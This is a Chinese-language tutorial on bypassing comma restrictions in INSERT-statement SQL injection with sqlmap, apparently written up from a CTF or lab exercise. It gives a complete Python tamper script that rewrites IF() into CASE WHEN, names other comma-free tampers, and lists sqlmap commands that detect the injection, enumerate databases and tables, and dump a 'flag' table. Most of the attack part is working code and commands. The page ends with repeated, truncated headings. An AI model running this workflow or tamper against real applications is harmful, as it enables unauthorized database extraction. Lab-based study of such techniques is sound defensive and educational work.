SQLMap Insert注入绕过技术详解<\/h1>

一、Insert注入概述<\/h2>
Insert注入是一种特殊的SQL注入类型，发生在应用程序使用用户输入构造INSERT语句时。与常见的SELECT注入不同，Insert注入有其独特的限制和绕过技术。<\/p>

关键特点：<\/h3>

注入点通常位于INSERT语句的VALUES部分<\/li>
常见于HTTP头部注入（如X-Forwarded-For）<\/li>
通常没有直接的回显，需要盲注技术<\/li>

对逗号(,)的使用有严格限制，会破坏语句结构<\/li> <\/ul>

二、环境准备与初步检测<\/h2>

1. 基本SQLMap命令<\/h3>

python sqlmap.py -r request_file -v 3<\/span> --technique T --level 3<\/span> --risk 3<\/span> --dbms MySQL
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

-r<\/code>：从文件加载HTTP请求<\/li>
-v 3<\/code>：详细输出级别<\/li>
--technique T<\/code>：指定时间盲注技术<\/li>
--level 3<\/code>：测试等级（包含HTTP头注入）<\/li>
--risk 3<\/code>：最高风险级别<\/li>
--dbms MySQL<\/code>：指定数据库类型<\/li>
<\/ul>
2. 常见问题<\/h3>
初始检测可能返回false positive，原因是：<\/p>

SQLMap默认使用包含逗号的IF函数结构：' OR 6634=IF((58=58),SLEEP(5),6634) AND 'GTiD'='GTiD<\/code><\/li>
在INSERT语句中，逗号会破坏VALUES部分的语法结构<\/li>
<\/ul>
三、关键绕过技术<\/h2>
1. IF函数改写为CASE-WHEN<\/h3>
编写tamper脚本if2casewhen.py<\/code>：<\/p>
#!\/usr\/bin\/env python<\/span>
<\/span><\/span>"""
<\/span><\/span><\/span>Author: Conan0xff
<\/span><\/span><\/span>"""<\/span>
<\/span><\/span>from<\/span> lib.core.enums import<\/span> PRIORITY
<\/span><\/span>
<\/span><\/span>__priority__ =<\/span> PRIORITY.<\/span>HIGHEST
<\/span><\/span>
<\/span><\/span>def<\/span> dependencies<\/span>():
<\/span><\/span>    pass<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> tamper<\/span>(payload, **<\/span>kwargs):
<\/span><\/span>    """
<\/span><\/span><\/span>    Replaces instances like 'IF(A,B,C)' with 'CASE WHEN (A) THEN (B) ELSE (C) END'
<\/span><\/span><\/span>    """<\/span>
<\/span><\/span>    if<\/span> payload and<\/span> payload.<\/span>find("IF"<\/span>) ><\/span> -<\/span>1<\/span>:
<\/span><\/span>        while<\/span> payload.<\/span>find("IF("<\/span>) ><\/span> -<\/span>1<\/span>:
<\/span><\/span>            index =<\/span> payload.<\/span>find("IF("<\/span>)
<\/span><\/span>            depth =<\/span> 1<\/span>
<\/span><\/span>            comma1, comma2, end =<\/span> None<\/span>, None<\/span>, None<\/span>
<\/span><\/span>            
<\/span><\/span>            for<\/span> i in<\/span> xrange(index +<\/span> len("IF("<\/span>), len(payload)):
<\/span><\/span>                if<\/span> depth ==<\/span> 1<\/span> and<\/span> payload[i] ==<\/span> ','<\/span> and<\/span> comma1 is<\/span> None<\/span>:
<\/span><\/span>                    comma1 =<\/span> i
<\/span><\/span>                elif<\/span> depth ==<\/span> 1<\/span> and<\/span> payload[i] ==<\/span> ','<\/span> and<\/span> comma1 is<\/span> not<\/span> None<\/span>:
<\/span><\/span>                    comma2 =<\/span> i
<\/span><\/span>                elif<\/span> depth ==<\/span> 1<\/span> and<\/span> payload[i] ==<\/span> ')'<\/span>:
<\/span><\/span>                    end =<\/span> i
<\/span><\/span>                    break<\/span>
<\/span><\/span>                elif<\/span> payload[i] ==<\/span> '('<\/span>:
<\/span><\/span>                    depth +=<\/span> 1<\/span>
<\/span><\/span>                elif<\/span> payload[i] ==<\/span> ')'<\/span>:
<\/span><\/span>                    depth -=<\/span> 1<\/span>
<\/span><\/span>            
<\/span><\/span>            if<\/span> comma1 and<\/span> comma2 and<\/span> end:
<\/span><\/span>                _ =<\/span> payload[index +<\/span> len("IF("<\/span>):comma1]
<\/span><\/span>                __ =<\/span> payload[comma1+<\/span>1<\/span>:comma2]
<\/span><\/span>                ___ =<\/span> payload[comma2 +<\/span> 1<\/span>:end].<\/span>lstrip()
<\/span><\/span>                newVal =<\/span> "(CASE WHEN (<\/span>%s<\/span>) THEN (<\/span>%s<\/span>) ELSE (<\/span>%s<\/span>) END)"<\/span> %<\/span> (_, __, ___)
<\/span><\/span>                payload =<\/span> payload[:index] +<\/span> newVal +<\/span> payload[end +<\/span> 1<\/span>:]
<\/span><\/span>            else<\/span>:
<\/span><\/span>                break<\/span>
<\/span><\/span>    
<\/span><\/span>    return<\/span> payload
<\/span><\/span><\/code><\/pre>转换示例：<\/p>

原IF语句：IF(1=1,1,2)<\/code><\/li>
转换后：CASE WHEN (1=1) THEN (1) ELSE (2) END<\/code><\/li>
<\/ul>
2. MID函数改写<\/h3>
使用commalessmid.py<\/code> tamper脚本：<\/p>

原格式：MID(VERSION(), 1, 1)<\/code><\/li>
转换后：MID(VERSION() FROM 1 FOR 1)<\/code><\/li>
<\/ul>
3. IFNULL函数改写<\/h3>
使用ifnull2casewhenisnull.py<\/code> tamper脚本：<\/p>

原格式：IFNULL(1, 2)<\/code><\/li>
转换后：CASE WHEN ISNULL(1) THEN (2) ELSE (1) END<\/code><\/li>
<\/ul>
4. LIMIT子句改写<\/h3>
使用commalesslimit.py<\/code> tamper脚本：<\/p>

原格式：LIMIT 2, 3<\/code><\/li>
转换后：LIMIT 3 OFFSET 2<\/code><\/li>
<\/ul>
四、完整注入流程<\/h2>
1. 检测注入点<\/h3>
python sqlmap.py -r testfiles\/xtest2 -v 3<\/span> --technique T --level 3<\/span> --risk 3<\/span> --dbms MySQL --tamper if2casewhen
<\/span><\/span><\/code><\/pre>2. 获取数据库名<\/h3>
python sqlmap.py -r testfiles\/xtest2 -v 3<\/span> --technique T --level 3<\/span> --risk 3<\/span> --tamper if2casewhen,ifnull2casewhenisnull,commalessmid --dbms MySQL --dbs --nocast
<\/span><\/span><\/code><\/pre>3. 获取表名<\/h3>
python sqlmap.py -r testfiles\/xtest2 -v 3<\/span> --technique T --level 3<\/span> --risk 3<\/span> --tamper if2casewhen,ifnull2casewhenisnull,commalessmid -D web15 --tables
<\/span><\/span><\/code><\/pre>4. 获取表数据<\/h3>
python sqlmap.py -r testfiles\/xtest2 -v 3<\/span> --technique T --level 3<\/span> --risk 3<\/span> --tamper if2casewhen,ifnull2casewhenisnull,commalessmid,commalesslimit -D web15 -T flag --dump
<\/span><\/span><\/code><\/pre>五、技术总结<\/h2>


关键点<\/strong>：INSERT注入主要限制在于逗号的使用，需要改写所有包含逗号的SQL函数和子句<\/p>
<\/li>

必要tamper组合<\/strong>：<\/p>

if2casewhen.py<\/code>：处理IF函数<\/li>
ifnull2casewhenisnull.py<\/code>：处理IFNULL函数<\/li>
commalessmid.py<\/code>：处理MID函数<\/li>
commalesslimit.py<\/code>：处理LIMIT子句<\/li>
<\/ul>
<\/li>

其他注意事项<\/strong>：<\/p>

使用--nocast<\/code>参数避免类型转换问题<\/li>
确保使用--technique T<\/code>指定时间盲注<\/li>
适当提高level和risk值以检测头部注入<\/li>
<\/ul>
<\/li>

扩展应用<\/strong>：<\/p>

该技术可应用于其他需要避免逗号的注入场景<\/li>
可自行开发更多tamper脚本处理其他含逗号的SQL函数<\/li>
<\/ul>
<\/li>
<\/ol>
通过合理组合这些tamper脚本，可以成功绕过INSERT注入的限制，实现完整的注入流程。<\/p>

SQLMap Insert注入绕过技术详解<\/h1>

一、Insert注入概述<\/h2> Insert注入是一种特殊的SQL注入类型，发生在应用程序使用用户输入构造INSERT语句时。与常见的SELECT注入不同，Insert注入有其独特的限制和绕过技术。<\/p>

二、环境准备与初步检测<\/h2>

三、关键绕过技术<\/h2>

四、完整注入流程<\/h2>

一、Insert注入概述<\/h2>
Insert注入是一种特殊的SQL注入类型，发生在应用程序使用用户输入构造INSERT语句时。与常见的SELECT注入不同，Insert注入有其独特的限制和绕过技术。<\/p>